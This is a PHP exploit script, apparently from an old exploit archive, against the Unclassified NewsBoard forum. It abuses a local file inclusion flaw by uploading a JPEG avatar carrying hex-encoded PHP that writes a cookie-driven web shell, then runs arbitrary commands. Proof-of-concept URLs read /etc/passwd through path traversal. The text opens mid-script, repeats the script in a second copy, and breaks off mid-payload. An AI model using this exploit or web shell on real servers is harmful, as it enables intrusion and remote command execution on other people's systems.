echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
die;
}
/* software site: http://newsboard.unclassified.de/
description: "The Unclassified NewsBoard (short UNB) is an open-source,
PHP-based internet bulletin board system"
vulnerable code in unb_lib/abbc.conf.php at lines 635-641:
...
// Smiley Definitions
if ($ABBC['Config']['smileset'])
{
$ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/';
$ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/';
@include($ABBC['Config']['smilepath'] . 'config.php');
}
...
$ABBC['Config']['smileset'] var is not initialized before to be used to include
files. You cannot have access to this code directly but in unb_lib/abbc.css.php
at line 16 we have:
...
require('abbc.conf.php');
...
this script is not protected by the unb_lib folder .htaccess file:
# Don't allow direct PHP requests in this directory
<Files *.inc.php>
Order allow,deny
Deny from all
</Files>
<Files *.lib.php>
Order allow,deny
Deny from all
</Files>
so, if register_globals = On & magic_quotes_gpc = Off, you can include files
from local resources, poc:
http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00
http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la
http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la
this script try to include an avatar or photo with malicious php code
inside, you need a valid account to upload files
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$username=$argv[3];
$pass=$argv[4];
$cmd="";$port=80;$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "step 0 -> check if suntzu.php is already installed...\r\n";
$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"56789"))
{
echo "Exploit succeeded...";
$temp=explode("56789",$html);
die("\r\n".$temp[1]."\r\n");
}
echo "step 1 -> login...\r\n";
$data ="LoginName=".urlencode(trim($username));
$data.="&LoginPassword=".urlencode(trim($pass));
$packet="POST ".$p."forum.php?req=setuser&module=main HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$cookie=$temp2[0];
$temp2=explode(' ',$temp[2]);
$cookie.=" ".$temp2[0];
echo 'Your cookie: '.$cookie."\r\n";
$temp=explode("=",$cookie);
$temp2=explode("+",$temp[2]);
$id=$temp2[0];
echo "User Id -> ".$id."\r\n";
echo "step 2 -> upload a malicious avatar with php code inside...\r\n";
$shell=
chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
/*
this image has this code inside as EXIF metadata content
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
fclose($fp);
chmod("suntzu.php",777);
?>
*/
$data='-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="action"
edit
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="id"
'.$id.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="cat"
postoptions
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="Signature"
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatar"
1
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatarfile"; filename="suntzu.jpeg"
Content-Type: image/pjpeg
'.$shell.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatarurl"
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photofile"; filename="suntzoi.jpeg"
Content-Type: image/pjpeg
'.$shell.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photourl"
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photo"
1
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="Save"
Save
-----------------------------7d614f2d12043e--
';
$packet ="POST ".$p."forum.php?req=cp HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d614f2d12043e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
echo "step 3 -> try to include avatar or photo...\r\n";
$xpl=array(
urlencode("../../upload/avatar_".$id.".jpeg".chr(0x00)),
urlencode("../../upload/photo_".$id.".jpeg".chr(0x00))
);
for ($i=0; $i<=count($xpl)-1; $i++)
{
$packet ="GET ".$p."unb_lib/abbc.css.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ABBC[Config][smileset]=".$xpl[$i]."; \r\n"; //pass evil var through cookies
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
}
echo "step 4 -> Launch commands...\r\n";
$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"56789"))
{
echo "Exploit succeeded...";
$temp=explode("56789",$html);
die("\r\n".$temp[1]."\r\n");
}
//if you are here...
echo "Exploit failed...";
?>
# milw0rm.com [2006-05-11]
rgod/unb_161p1_incl_xpl.txt ( na)
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary\r\n";
echo "local inclusion\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to UNB\r\n";
echo "cmd: a shell command\r\n";
echo "user/pass: you need a valid user account to upload files\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n";
echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
die;
}
/* software site: http://newsboard.unclassified.de/
description: "The Unclassified NewsBoard (short UNB) is an open-source,
PHP-based internet bulletin board system"
vulnerable code in unb_lib/abbc.conf.php at lines 635-641:
...
// Smiley Definitions
if ($ABBC['Config']['smileset'])
{
$ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/';
$ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/';
@include($ABBC['Config']['smilepath'] . 'config.php');
}
...
$ABBC['Config']['smileset'] var is not initialized before to be used to include
files. You cannot have access to this code directly but in unb_lib/abbc.css.php
at line 16 we have:
...
require('abbc.conf.php');
...
this script is not protected by the unb_lib folder .htaccess file:
# Don't allow direct PHP requests in this directory
<Files *.inc.php>
Order allow,deny
Deny from all
</Files>
<Files *.lib.php>
Order allow,deny
Deny from all
</Files>
so, if register_globals = On & magic_quotes_gpc = Off, you can include files
from local resources, poc:
http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00
http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la
http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la
this script try to include an avatar or photo with malicious php code
inside, you need a valid account to upload files
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$username=$argv[3];
$pass=$argv[4];
$cmd="";$port=80;$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "step 0 -> check if suntzu.php is already installed...\r\n";
$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"56789"))
{
echo "Exploit succeeded...";
$temp=explode("56789",$html);
die("\r\n".$temp[1]."\r\n");
}
echo "step 1 -> login...\r\n";
$data ="LoginName=".urlencode(trim($username));
$data.="&LoginPassword=".urlencode(trim($pass));
$packet="POST ".$p."forum.php?req=setuser&module=main HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$cookie=$temp2[0];
$temp2=explode(' ',$temp[2]);
$cookie.=" ".$temp2[0];
echo 'Your cookie: '.$cookie."\r\n";
$temp=explode("=",$cookie);
$temp2=explode("+",$temp[2]);
$id=$temp2[0];
echo "User Id -> ".$id."\r\n";
echo "step 2 -> upload a malicious avatar with php code inside...\r\n";
$shell=
chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
